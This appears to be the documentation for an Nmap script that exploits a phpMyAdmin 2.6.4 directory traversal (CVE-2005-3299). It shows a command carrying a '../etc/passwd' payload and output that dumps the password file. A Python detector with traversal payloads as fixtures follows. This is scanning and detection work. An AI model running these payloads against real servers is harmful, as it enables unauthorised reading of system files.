Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and
possibly other versions) to retrieve remote files on the web server.

nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>

PORT STATE SERVICE
80/tcp open http
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2005-3299
| Description:
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|
| Disclosure date: 2005-10-nil
| Extra information:
| ../../../../../../../../etc/passwd :
| root:x:0:0:root:/root:/bin/bash
| daemon:x:1:1:daemon:/usr/sbin:/bin/sh
| bin:x:2:2:bin:/bin:/bin/sh
| sys:x:3:3:sys:/dev:/bin/sh
| sync:x:4:65534:sync:/bin:/bin/sync
| games:x:5:60:games:/usr/games:/bin/sh
| man:x:6:12:man:/var/cache/man:/bin/sh
| lp:x:7:7:lp:/var/spool/lpd:/bin/sh
| mail:x:8:8:mail:/var/mail:/bin/sh
| news:x:9:9:news:/var/spool/news:/bin/sh
| uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
| proxy:x:13:13:proxy:/bin:/bin/sh
| www-data:x:33:33:www-data:/var/www:/bin/sh
| backup:x:34:34:backup:/var/backups:/bin/sh
| list:x:38:38:Mailing List Manager:/var/list:/bin/sh
| irc:x:39:39:ircd:/var/run/ircd:/bin/sh
| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
| nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
| libuuid:x:100:101::/var/lib/libuuid:/bin/sh
| syslog:x:101:103::/home/syslog:/bin/false
| sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
| dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
| vboxadd:x:999:1::/var/run/vboxadd:/bin/false
| mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
| memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
| ../../../../../../../../etc/passwd saved to passwd.txt
|
| References:
| http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_ http://www.exploit-db.com/exploits/1244/
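
To spot requests of this kind in logged HTTP traffic, the following Python detector flags direct requests for grab_globals.lib.php and marks those whose subform/redirect fields carry a traversal sequence, including percent-encoded and double-encoded forms. It is an added example, not part of the Nmap script or its documentation. Assumptions: records are (method, URI, body) tuples as a body-logging proxy or WAF would provide, the sample records and the /pma/libraries/ path are constructed, and the field-name match ("subform" plus "redirect") is drawn from the CVE description above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample records: (method, request URI, request body).
SAMPLE_REQUESTS = [
    ("GET", "/pma/index.php?lang=en", ""),
    ("POST", "/pma/libraries/grab_globals.lib.php",
     "subform[1][redirect]=../../../../etc/passwd"),
    ("POST", "/pma/libraries/grab_globals.lib.php",
     "subform%5B1%5D%5Bredirect%5D=%252e%252e%252fetc%252fpasswd"),
    ("POST", "/pma/libraries/grab_globals.lib.php", "subform[1][redirect]=main.php"),
    ("GET", "/pma/libraries/grab_globals.lib.php", ""),
]

TRAVERSAL = re.compile(r"\.\.[/\\]")  # ../ or ..\ after decoding


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded ../ is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(method, uri, body):
    """Return 'traversal', 'direct-access' or None for one request."""
    parts = urlsplit(uri)
    if not fully_decode(parts.path).lower().endswith("grab_globals.lib.php"):
        return None
    # Collect fields from both the query string and the form body.
    fields = parse_qsl(parts.query, keep_blank_values=True)
    fields += parse_qsl(body, keep_blank_values=True)
    for name, value in fields:
        name = fully_decode(name).lower()
        if "subform" in name and "redirect" in name \
                and TRAVERSAL.search(fully_decode(value)):
            return "traversal"
    # A library file requested directly is worth review even without a payload.
    return "direct-access"


def scan(requests):
    """Return (index, verdict) for every request that was flagged."""
    return [(i, verdict) for i, r in enumerate(requests)
            if (verdict := classify(*r))]
```

Access logs alone usually omit POST bodies, so the "traversal" verdict needs a source that records them; the "direct-access" verdict works from the request line only.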